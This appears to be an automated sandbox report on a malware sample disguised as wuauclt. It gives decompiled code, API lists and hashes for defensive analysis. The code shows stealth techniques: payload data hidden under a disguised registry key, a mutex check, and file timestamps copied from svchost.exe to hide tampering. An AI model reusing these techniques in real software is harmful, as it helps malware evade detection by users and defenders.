													asm("movq [esp+0x3c4], xmm0");
													asm("movups [esp+0x3b4], xmm0");
													_v280 = 0;
													_t94 = _t87 + 1;
													do {
														_t69 =  *_t87;
														_t87 = _t87 + 1;
														__eflags = _t69;
													} while (_t69 != 0);
													_t37 =  &_v308; // 0x435049
													_t71 = E002559D0("IPC", _t37, _t87 - _t94); // executed
													_t103 = _t103 + 0xc;
													__eflags = _t71;
													if(_t71 == 0) {
														goto L4;
													} else {
														_push("Install_Done"); // executed
														E00256760(_t75, _t96, 0); // executed
														_t104 = _t103 + 4;
													}
												} else {
													_t99 = 0x58;
													goto L4;
												}
											} else {
												_t99 = 0x4d;
												goto L4;
											}
										} else {
											_t99 = 0x42;
											goto L4;
										}
									} else {
										_t99 = 0x37;
										goto L4;
									}
								} else {
									_t99 = 0x2c;
									goto L4;
								}
							} else {
								_t99 = 0x21;
								goto L4;
							}
						} else {
							_t99 = 0x17;
							L4:
							_push(_t99);
							_push("Error_%d");
							E00256760(_t75, _t96, _t99);
							_t104 = _t103 + 8; // executed
						}
					} else {
						ReleaseMutex(_t96);
						CloseHandle(_t96);
						goto L3;
					}
				}
				E002562A0(_t96, _t99); // executed
				_pop(_t100);
				return E00257097(_v8 ^ _t104, _t100); // executed
			}







































                                                0x00256960
                                                0x00256966
                                                0x0025696c
                                                0x00256973
                                                0x0025697b
                                                0x0025697c
                                                0x00256982
                                                0x00256993
                                                0x00256995
                                                0x002569a1
                                                0x002569a9
                                                0x002569b4
                                                0x002569be
                                                0x002569c4
                                                0x002569d1
                                                0x002569d6
                                                0x002569ea
                                                0x002569ea
                                                0x00000000
                                                0x002569d8
                                                0x002569da
                                                0x00256a18
                                                0x00256a1d
                                                0x00256a1f
                                                0x00256a37
                                                0x00256a4e
                                                0x00256a58
                                                0x00256a61
                                                0x00256a6c
                                                0x00256a71
                                                0x00256a74
                                                0x00256a76
                                                0x00256a8e
                                                0x00256a93
                                                0x00256a9a
                                                0x00256a9f
                                                0x00256aa1
                                                0x00256ab8
                                                0x00256abd
                                                0x00256abf
                                                0x00256ad3
                                                0x00256ada
                                                0x00256adf
                                                0x00256ae2
                                                0x00256ae4
                                                0x00256af0
                                                0x00256b01
                                                0x00256b06
                                                0x00256b09
                                                0x00256b0b
                                                0x00256b1e
                                                0x00256b27
                                                0x00256b44
                                                0x00256b49
                                                0x00256b51
                                                0x00256b5b
                                                0x00256b60
                                                0x00256b63
                                                0x00256b6f
                                                0x00256b72
                                                0x00256b7d
                                                0x00256b7d
                                                0x00256b84
                                                0x00256b8d
                                                0x00256b95
                                                0x00256b9c
                                                0x00256ba0
                                                0x00256ba0
                                                0x00256ba2
                                                0x00256ba3
                                                0x00256ba3
                                                0x00256ba9
                                                0x00256bb7
                                                0x00256bbc
                                                0x00256bbf
                                                0x00256bc1
                                                0x00000000
                                                0x00256bc7
                                                0x00256bc7
                                                0x00256bcc
                                                0x00256bd1
                                                0x00256bd1
                                                0x00256b65
                                                0x00256b65
                                                0x00000000
                                                0x00256b65
                                                0x00256b0d
                                                0x00256b0d
                                                0x00000000
                                                0x00256b0d
                                                0x00256ae6
                                                0x00256ae6
                                                0x00000000
                                                0x00256ae6
                                                0x00256ac1
                                                0x00256ac1
                                                0x00000000
                                                0x00256ac1
                                                0x00256aa3
                                                0x00256aa3
                                                0x00000000
                                                0x00256aa3
                                                0x00256a78
                                                0x00256a78
                                                0x00000000
                                                0x00256a78
                                                0x00256a21
                                                0x00256a21
                                                0x002569ef
                                                0x002569ef
                                                0x002569f0
                                                0x002569f5
                                                0x002569fa
                                                0x002569fa
                                                0x002569dc
                                                0x002569dd
                                                0x002569e4
                                                0x00000000
                                                0x002569e4
                                                0x002569da
                                                0x002569fd
                                                0x00256a0c
                                                0x00256a17

                                                APIs
                                                • FreeConsole.KERNELBASE ref: 0025697C
                                                • CreateMutexA.KERNELBASE(?,?,00000000), ref: 002569BE
                                                • GetLastError.KERNEL32(?,?,00000000), ref: 002569C6
                                                • ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 002569DD
                                                • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 002569E4
                                                  • Part of subcall function 002559D0: RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location,00000000,00000000,00000000,000F003F,00000000,00000000,?), ref: 00255A03
                                                  • Part of subcall function 002559D0: RegSetValueExA.KERNELBASE(00000000,00000001,00000000,00000003,?,?), ref: 00255A1C
                                                  • Part of subcall function 002559D0: RegCloseKey.ADVAPI32(00000000), ref: 00255A29
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 00256A4E
                                                • Sleep.KERNELBASE(00001388), ref: 00256B51
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: CloseCreateMutex$ConsoleErrorFileFreeHandleLastModuleNameReleaseSleepValue
                                                • String ID: 0-7D$789N$Error_%d$IPC$IPC$Install_Done$}
                                                • API String ID: 3982608030-489000174
                                                • Opcode ID: a62327d9140d9f74a92b40071f426d1eb8a6a6eb69fada363683d70574792a95
                                                • Instruction ID: bd47fbe89e7e7a31ada006f732fa10f0b05a701fe534773bc1628e8590d1db43
                                                • Opcode Fuzzy Hash: a62327d9140d9f74a92b40071f426d1eb8a6a6eb69fada363683d70574792a95
                                                • Instruction Fuzzy Hash: FC510B714283418BD720DF50E959BEB73ACAF9030AF40482EFD8963191EBB05A5CCB97
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00255B10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 96filetimeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 89%
                                                			E00255B10(CHAR* __ecx, void* __edi) {
				signed int _v8;
				char _v276;
				struct _FILETIME _v284;
				struct _FILETIME _v292;
				struct _FILETIME _v300;
				void* __esi;
				signed int _t19;
				void* _t21;
				intOrPtr _t27;
				char _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				char _t31;
				void* _t33;
				intOrPtr* _t50;
				void* _t55;
				signed int _t57;

				_t19 =  *0x271004; // 0x80aab37c
				_v8 = _t19 ^ _t57;
				_t21 = CreateFileA(__ecx, 0xc0000000, 3, 0, 3, 0x80, 0); // executed
				_t56 = _t21;
				if(_t56 == 0xffffffff) {
					L6:
					return E00257097(_v8 ^ _t57, _t56);
				} else {
					E002596C0(CreateFileA,  &_v276, 0, 0x104);
					GetSystemDirectoryA( &_v276, 0x104);
					_t50 =  &_v276 - 1;
					asm("o16 nop [eax+eax]");
					do {
						_t27 =  *((intOrPtr*)(_t50 + 1));
						_t50 = _t50 + 1;
					} while (_t27 != 0);
					_t28 = "\\svchost.exe"; // 0x6376735c
					 *_t50 = _t28;
					_t29 = M0026EC8C; // 0x74736f68
					 *((intOrPtr*)(_t50 + 4)) = _t29;
					_t30 =  *0x26ec90; // 0x6578652e
					 *((intOrPtr*)(_t50 + 8)) = _t30;
					_t31 =  *0x26ec94; // 0x0
					 *((char*)(_t50 + 0xc)) = _t31;
					_t33 = CreateFileA( &_v276, 0x80000000, 1, 0, 3, 0x80, 0); // executed
					_t55 = _t33;
					if(_t55 != 0xffffffff) {
						GetFileTime(_t55,  &_v300,  &_v292,  &_v284);
						SetFileTime(_t56,  &_v300,  &_v292,  &_v284); // executed
						_t56 = CloseHandle;
						CloseHandle(CloseHandle);
						CloseHandle(_t55);
						goto L6;
					} else {
						CloseHandle(_t56);
						return E00257097(_v8 ^ _t57, _t56);
					}
				}
			}




















                                                0x00255b19
                                                0x00255b20
                                                0x00255b3e
                                                0x00255b40
                                                0x00255b45
                                                0x00255c26
                                                0x00255c35
                                                0x00255b4b
                                                0x00255b59
                                                0x00255b6d
                                                0x00255b79
                                                0x00255b7a
                                                0x00255b80
                                                0x00255b80
                                                0x00255b83
                                                0x00255b86
                                                0x00255b8a
                                                0x00255b91
                                                0x00255b93
                                                0x00255b9d
                                                0x00255ba0
                                                0x00255ba7
                                                0x00255baa
                                                0x00255bb3
                                                0x00255bc2
                                                0x00255bc4
                                                0x00255bc9
                                                0x00255bf8
                                                0x00255c14
                                                0x00255c1b
                                                0x00255c21
                                                0x00255c24
                                                0x00000000
                                                0x00255bcb
                                                0x00255bcc
                                                0x00255be1
                                                0x00255be1
                                                0x00255bc9

                                                APIs
                                                • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00255B3E
                                                • GetSystemDirectoryA.KERNEL32 ref: 00255B6D
                                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00255BC2
                                                • CloseHandle.KERNEL32(00000000), ref: 00255BCC
                                                • GetFileTime.KERNEL32(00000000,?,?,?), ref: 00255BF8
                                                • SetFileTime.KERNELBASE(00000000,?,?,?), ref: 00255C14
                                                • CloseHandle.KERNEL32(00000000), ref: 00255C21
                                                • CloseHandle.KERNEL32(00000000), ref: 00255C24
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: File$CloseHandle$CreateTime$DirectorySystem
                                                • String ID: \svchost.exe
                                                • API String ID: 2251316602-2416354339
                                                • Opcode ID: 2138cd69d91255b4ceae746fe3245b052a45f8aa07cb3863646316d06904dc48
                                                • Instruction ID: 1698375d326685a8626bd52858ae1ca3f8e082cebd0abca61f39cef9b2b564ef
                                                • Opcode Fuzzy Hash: 2138cd69d91255b4ceae746fe3245b052a45f8aa07cb3863646316d06904dc48
                                                • Instruction Fuzzy Hash: 5331C67290011CAFDB11DF64EC45FE9B7BCAB08314F14419AF608E71D1DAB1AA99CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00254880 Relevance: 12.1, APIs: 8, Instructions: 141COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 80%
                                                			E00254880(void* __ecx, void** _a4, long* _a8) {
				void* _v8;
				long _v12;
				signed int _v16;
				char _v20;
				void* __edi;
				void* __esi;
				void* _t42;
				long _t48;
				void* _t49;
				long _t58;
				long _t59;
				void* _t60;
				long _t63;
				void* _t76;
				void* _t78;
				long* _t79;
				long _t88;
				intOrPtr _t91;
				intOrPtr* _t94;
				void* _t99;
				void* _t100;

				_v8 = 0;
				_v12 = 0;
				_t42 = E002547A0(__ecx,  &_v8,  &_v12); // executed
				_t100 = _t99 + 4;
				if(_t42 != 0) {
					_t88 = _v12;
					_t76 = 0;
					_v16 = 0;
					__eflags = _t88;
					if(__eflags <= 0) {
						L12:
						LocalFree(_v8); // executed
						return _v16;
					} else {
						_push(_t94);
						while(1) {
							_t94 = E002570A8(_t94, __eflags, 0x58);
							_v20 = _t94;
							_v20 = _t94;
							E002596C0(_t88, _t94, 0, 0x58);
							_t100 = _t100 + 0x10;
							asm("movups xmm0, [ebx+eax]");
							asm("movups [esi], xmm0");
							asm("movups xmm0, [ebx+eax+0x10]");
							asm("movups [esi+0x10], xmm0");
							asm("movups xmm0, [ebx+eax+0x20]");
							asm("movups [esi+0x20], xmm0");
							asm("movups xmm0, [ebx+eax+0x30]");
							asm("movups [esi+0x30], xmm0");
							asm("movups xmm0, [ebx+eax+0x40]");
							_t78 = _t76 + 0x50;
							asm("movups [esi+0x40], xmm0");
							__eflags =  *_t94 - 0x20e;
							if( *_t94 == 0x20e) {
								break;
							}
							_t76 = _t78 +  *(_t94 + 0x38) +  *(_t94 + 0xc);
							__eflags = _t76 - _t88;
							if(__eflags < 0) {
								continue;
							} else {
								LocalFree(_v8);
								return _v16;
							}
							goto L13;
						}
						_t48 =  *(_t94 + 0xc);
						_v12 = _t48;
						_t49 = LocalAlloc(0x40, _t48); // executed
						 *(_t94 + 0x50) = _t49;
						 *((intOrPtr*)(_t94 + 0x54)) = LocalAlloc(0x40,  *(_t94 + 0x38));
						E00267820( *(_t94 + 0x50), _v8 + _t78, _v12);
						E00267820( *((intOrPtr*)(_t94 + 0x54)), _v12 + _t78 + _v8,  *(_t94 + 0x38));
						_t58 = E00254670( &_v20);
						__eflags = _t58;
						if(_t58 == 0) {
							L11:
							goto L12;
						} else {
							_t91 = _v20;
							_t79 = _a8;
							_t59 =  *(_t91 + 8);
							 *_t79 = _t59; // executed
							_t60 = LocalAlloc(0x40, _t59); // executed
							 *_a4 = _t60;
							E002596C0(_t91, _t60, 0,  *(_t91 + 8));
							_t63 = E00251000(_t60, _t79,  *((intOrPtr*)(_t91 + 0x50)), _v12);
							__eflags = _t63;
							if(_t63 == 0) {
								__eflags =  *_t79 -  *(_t91 + 8);
								_t66 =  ==  ? 1 : _v16 & 0x000000ff;
								_v16 =  ==  ? 1 : _v16 & 0x000000ff;
								goto L11;
							} else {
								LocalFree( *_a4);
								LocalFree(_v8);
								return _v16;
							}
						}
					}
				} else {
					return _t42;
				}
				L13:
			}
























                                                0x00254889
                                                0x00254894
                                                0x0025489b
                                                0x002548a0
                                                0x002548a5
                                                0x002548ad
                                                0x002548b0
                                                0x002548b2
                                                0x002548b6
                                                0x002548b8
                                                0x002549f6
                                                0x002549f9
                                                0x00254a07
                                                0x002548be
                                                0x002548be
                                                0x002548c0
                                                0x002548c7
                                                0x002548cd
                                                0x002548d1
                                                0x002548d4
                                                0x002548dc
                                                0x002548df
                                                0x002548e3
                                                0x002548e6
                                                0x002548eb
                                                0x002548ef
                                                0x002548f4
                                                0x002548f8
                                                0x002548fd
                                                0x00254901
                                                0x00254906
                                                0x00254909
                                                0x0025490d
                                                0x00254913
                                                0x00000000
                                                0x00000000
                                                0x0025491b
                                                0x0025491d
                                                0x0025491f
                                                0x00000000
                                                0x00254921
                                                0x00254925
                                                0x00254933
                                                0x00254933
                                                0x00000000
                                                0x0025491f
                                                0x00254934
                                                0x0025493d
                                                0x00254940
                                                0x00254949
                                                0x00254955
                                                0x00254961
                                                0x00254973
                                                0x0025497e
                                                0x00254983
                                                0x00254985
                                                0x002549f5
                                                0x00000000
                                                0x00254987
                                                0x00254987
                                                0x0025498a
                                                0x0025498d
                                                0x00254993
                                                0x00254995
                                                0x002549a6
                                                0x002549a8
                                                0x002549b5
                                                0x002549bd
                                                0x002549bf
                                                0x002549e9
                                                0x002549ef
                                                0x002549f2
                                                0x00000000
                                                0x002549c1
                                                0x002549c6
                                                0x002549d0
                                                0x002549de
                                                0x002549de
                                                0x002549bf
                                                0x00254985
                                                0x002548aa
                                                0x002548aa
                                                0x002548aa
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 002547A0: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002547BD
                                                • new.LIBCMT ref: 002548C2
                                                • LocalFree.KERNEL32(00000000), ref: 00254925
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: CreateFileFreeLocal
                                                • String ID:
                                                • API String ID: 3879352100-0
                                                • Opcode ID: 4923ff63a2d72cdd8e5ddd9fac8a382738af571e11c54f7ea4c6c34fc51a159a
                                                • Instruction ID: d01de24b38d1d2b471cc5205bec0b0d452474227f332ae68ef344c810783de14
                                                • Opcode Fuzzy Hash: 4923ff63a2d72cdd8e5ddd9fac8a382738af571e11c54f7ea4c6c34fc51a159a
                                                • Instruction Fuzzy Hash: 4251E031D00748EBDB109FA8DC45AAEFBB4FF48309F044594ED48A7212D771AAA8CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002547A0 Relevance: 12.1, APIs: 8, Instructions: 89filememoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 290 2547a0-2547c8 CreateFileA 291 2547d1-254801 GetFileSizeEx LocalAlloc 290->291 292 2547ca-2547d0 290->292 293 254803-254811 CloseHandle 291->293 294 254812-254820 291->294 295 254822-25483e ReadFile 294->295 296 25484e-254852 294->296 297 254840-254849 295->297 298 25484b 295->298 299 254854-25486c CloseHandle LocalFree 296->299 300 25486d-25487a FindCloseChangeNotification 296->300 297->295 297->298 298->296
                                                C-Code - Quality: 67%
                                                			E002547A0(CHAR* __ecx, void** __edx, struct _OVERLAPPED** _a4) {
				void** _v8;
				long _v12;
				long _v16;
				struct _OVERLAPPED* _v20;
				long _v24;
				void* _t15;
				void* _t17;
				long _t18;
				long _t26;
				void* _t30;
				void** _t32;
				struct _OVERLAPPED** _t36;
				void* _t38;
				long _t39;

				_v8 = __edx;
				_t15 = CreateFileA(__ecx, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t30 = _t15;
				if(_t30 != 0xffffffff) {
					_v24 = 0;
					_v20 = 0;
					__imp__GetFileSizeEx(_t30,  &_v24, _t38);
					_t39 = _v24;
					_v16 = _t39;
					_t17 = LocalAlloc(0x40, _t39); // executed
					_t32 = _v8;
					 *_t32 = _t17;
					if(_t17 != 0) {
						_t36 = _a4;
						_t18 = _t39;
						 *_t36 = 0;
						if(_t18 > 0) {
							while(1) {
								_v12 = 0;
								ReadFile(_t30,  *_t32, _t39,  &_v12, 0); // executed
								_t26 = _v12;
								if(_t26 == 0) {
									break;
								}
								 *_t36 =  *_t36 + _t26;
								_t39 = _t39 - _t26;
								_t32 = _v8;
								if(_t39 > 0) {
									continue;
								}
								break;
							}
							_t18 = _v16;
						}
						_push(_t30);
						if( *_t36 == _t18) {
							FindCloseChangeNotification(); // executed
							return 1;
						} else {
							CloseHandle();
							LocalFree( *_v8);
							return 0; // executed
						}
					} else {
						CloseHandle(_t30);
						return 0;
					}
				} else {
					return 0;
				}
			}

















                                                0x002547ba
                                                0x002547bd
                                                0x002547c3
                                                0x002547c8
                                                0x002547d5
                                                0x002547de
                                                0x002547e5
                                                0x002547eb
                                                0x002547f1
                                                0x002547f4
                                                0x002547fa
                                                0x002547fd
                                                0x00254801
                                                0x00254813
                                                0x00254816
                                                0x00254818
                                                0x00254820
                                                0x00254822
                                                0x00254827
                                                0x00254833
                                                0x00254839
                                                0x0025483e
                                                0x00000000
                                                0x00000000
                                                0x00254840
                                                0x00254842
                                                0x00254844
                                                0x00254849
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00254849
                                                0x0025484b
                                                0x0025484b
                                                0x00254851
                                                0x00254852
                                                0x0025486d
                                                0x0025487a
                                                0x00254854
                                                0x00254854
                                                0x0025485f
                                                0x0025486c
                                                0x0025486c
                                                0x00254803
                                                0x00254804
                                                0x00254811
                                                0x00254811
                                                0x002547ca
                                                0x002547d0
                                                0x002547d0

                                                APIs
                                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002547BD
                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002547E5
                                                • LocalAlloc.KERNELBASE(00000040,00000000,?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002547F4
                                                • CloseHandle.KERNEL32(00000000,?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00254804
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: File$AllocCloseCreateHandleLocalSize
                                                • String ID:
                                                • API String ID: 966313076-0
                                                • Opcode ID: df54ca82ec0148107ba679ade653d357ecd3af3f31bab97b10efa1ee7e79c087
                                                • Instruction ID: 6e4b37cd0fdac656214a67e729daafaf50b3a12e1659da2c1a69e951fc450818
                                                • Opcode Fuzzy Hash: df54ca82ec0148107ba679ade653d357ecd3af3f31bab97b10efa1ee7e79c087
                                                • Instruction Fuzzy Hash: 8D217171900219EBDF109FA8EC49BDABBBCFB05315F204195FD04E3291DB715994DB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00256160 Relevance: 12.1, APIs: 8, Instructions: 87filememoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 301 256160-25618a CreateFileA 302 2561c4-2561cc 301->302 303 25618c-2561bb GetFileSizeEx LocalAlloc 301->303 304 2561cd-2561da 303->304 305 2561bd-2561be CloseHandle 303->305 306 25620c-25620f 304->306 307 2561dc 304->307 305->302 308 256211-25622a CloseHandle LocalFree 306->308 309 25622b-256239 FindCloseChangeNotification 306->309 310 2561e0-2561fc ReadFile 307->310 311 2561fe-256207 310->311 312 256209 310->312 311->310 311->312 312->306
                                                C-Code - Quality: 67%
                                                			E00256160(CHAR* __ecx, void** __edx, struct _OVERLAPPED** _a4) {
				void** _v12;
				long _v16;
				long _v20;
				struct _OVERLAPPED* _v28;
				long _v32;
				void* _t15;
				void* _t18;
				long _t19;
				long _t27;
				void* _t29;
				void** _t31;
				struct _OVERLAPPED** _t34;
				long _t35;

				_v12 = __edx;
				_t15 = CreateFileA(__ecx, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t29 = _t15;
				if(_t29 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					__imp__GetFileSizeEx(_t29,  &_v32);
					_t35 = _v32;
					_v20 = _t35;
					_t18 = LocalAlloc(0x40, _t35); // executed
					_t31 = _v12;
					 *_t31 = _t18;
					if(_t18 != 0) {
						_t34 = _a4;
						_t19 = _t35;
						 *_t34 = 0;
						if(_t19 > 0) {
							while(1) {
								_v16 = 0;
								ReadFile(_t29,  *_t31, _t35,  &_v16, 0); // executed
								_t27 = _v16;
								if(_t27 == 0) {
									break;
								}
								 *_t34 =  *_t34 + _t27;
								_t35 = _t35 - _t27;
								_t31 = _v12;
								if(_t35 > 0) {
									continue;
								}
								break;
							}
							_t19 = _v20;
						}
						_push(_t29);
						if( *_t34 == _t19) {
							FindCloseChangeNotification(); // executed
							return 1;
						} else {
							CloseHandle();
							LocalFree( *_v12);
							return 0; // executed
						}
					} else {
						CloseHandle(_t29);
						goto L3;
					}
				}
			}
















                                                0x0025617c
                                                0x0025617f
                                                0x00256185
                                                0x0025618a
                                                0x002561c4
                                                0x002561cc
                                                0x0025618c
                                                0x0025618f
                                                0x00256198
                                                0x0025619f
                                                0x002561a5
                                                0x002561ab
                                                0x002561ae
                                                0x002561b4
                                                0x002561b7
                                                0x002561bb
                                                0x002561cd
                                                0x002561d0
                                                0x002561d2
                                                0x002561da
                                                0x002561e0
                                                0x002561e5
                                                0x002561f1
                                                0x002561f7
                                                0x002561fc
                                                0x00000000
                                                0x00000000
                                                0x002561fe
                                                0x00256200
                                                0x00256202
                                                0x00256207
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00256207
                                                0x00256209
                                                0x00256209
                                                0x0025620c
                                                0x0025620f
                                                0x0025622b
                                                0x00256239
                                                0x00256211
                                                0x00256211
                                                0x0025621c
                                                0x0025622a
                                                0x0025622a
                                                0x002561bd
                                                0x002561be
                                                0x00000000
                                                0x002561be
                                                0x002561bb

                                                APIs
                                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0025617F
                                                • GetFileSizeEx.KERNEL32(00000000,?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0025619F
                                                • LocalAlloc.KERNELBASE(00000040,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002561AE
                                                • CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002561BE
                                                • ReadFile.KERNELBASE(00000000,?,00000000,?,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002561F1
                                                • CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00256211
                                                • LocalFree.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0025621C
                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0025622B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: CloseFile$HandleLocal$AllocChangeCreateFindFreeNotificationReadSize
                                                • String ID:
                                                • API String ID: 4148216468-0
                                                • Opcode ID: 2a1b928d30cd4bbac15f3cd26728e518a296ddbe1fb21f2d03d0c4261a3fe9dc
                                                • Instruction ID: 6f8e5b7895b021ad9469e7c3f1393fe0911bbc5ee6b96c5427c99b8ba52d4a31
                                                • Opcode Fuzzy Hash: 2a1b928d30cd4bbac15f3cd26728e518a296ddbe1fb21f2d03d0c4261a3fe9dc
                                                • Instruction Fuzzy Hash: B421A375A00215EBDB108FA5EC4DBAEBBBCFB48311F108155FD18E7290DBB19958CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00255A50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 323 255a50-255a7a RegOpenKeyExA 324 255a82-255aac RegQueryValueExA 323->324 325 255a7c-255a81 323->325 324->325 326 255aae-255ab3 324->326 326->325 327 255ab5-255abd 326->327 328 255b03-255b09 327->328 329 255abf-255ae8 call 2596c0 RegQueryValueExA 327->329 329->328 332 255aea-255aef 329->332 332->328 333 255af1-255b02 RegCloseKey 332->333
                                                C-Code - Quality: 100%
                                                			E00255A50(char* _a8, intOrPtr* _a12) {
				int _v8;
				void* _v12;
				int _v16;
				void* __edi;
				long _t17;
				int _t22;
				int _t27;
				intOrPtr* _t32;

				_v12 = 0;
				_t17 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows NT\\CurrentVersion\\NetworkPlatform\\Location", 0, 0x20019,  &_v12); // executed
				if(_t17 == 0) {
					_v16 = 0;
					_v8 = 0;
					if(RegQueryValueExA(_v12, "LastBackup", 0,  &_v16, 0,  &_v8) != 0) {
						goto L1;
					} else {
						_t22 = _v8;
						if(_t22 == 0) {
							goto L1;
						} else {
							_t32 = _a12;
							_t30 =  *_t32;
							if( *_t32 < _t22) {
								L8:
								return 0;
							} else {
								E002596C0(_t32, _a8, 0, _t30);
								if(RegQueryValueExA(_v12, "LastBackup", 0, 0, _a8,  &_v8) != 0) {
									goto L8;
								} else {
									_t27 = _v8;
									if(_t27 == 0) {
										goto L8;
									} else {
										 *_t32 = _t27;
										RegCloseKey(_v12);
										return 1;
									}
								}
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}











                                                0x00255a59
                                                0x00255a72
                                                0x00255a7a
                                                0x00255a85
                                                0x00255a92
                                                0x00255aac
                                                0x00000000
                                                0x00255aae
                                                0x00255aae
                                                0x00255ab3
                                                0x00000000
                                                0x00255ab5
                                                0x00255ab6
                                                0x00255ab9
                                                0x00255abd
                                                0x00255b03
                                                0x00255b09
                                                0x00255abf
                                                0x00255ac5
                                                0x00255ae8
                                                0x00000000
                                                0x00255aea
                                                0x00255aea
